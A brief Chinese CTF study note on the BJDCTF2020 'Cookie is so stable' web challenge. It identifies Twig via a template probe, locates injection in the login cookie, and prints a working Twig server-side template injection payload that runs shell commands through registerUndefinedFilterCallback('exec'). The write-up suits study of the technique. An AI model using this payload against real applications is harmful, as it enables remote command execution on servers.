「配枪朱丽叶。」

RootのCTF学习笔记。

BJDCTF2020/BUUCTF-WEB:Cookie is so stable(Twig模板注入)

ssti主要为python的一些框架jinja2 mako tornado django
模板注入测试顺序--是时候祭出这张图了:
https://s2.ax1x.com/2020/01/28/1M1vsx.jpg

首先到/flag.php这页进行测试:
https://s2.ax1x.com/2020/01/29/1Mr3LD.png

Twig 
{{7*'7'}} 输出49
Jinja
{{7*'7'}}输出7777777

测试证明是Twig:
https://s2.ax1x.com/2020/01/29/1MrNFA.png
参考了这篇文章:
www.k0rz3n.com

因为提示cookie,经测试,登陆后cookie里的user是注入点:
https://s2.ax1x.com/2020/01/29/1MrBy8.png

payload:
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}

https://s2.ax1x.com/2020/01/29/1MrDOS.png
自己最后cat /flag就可以了。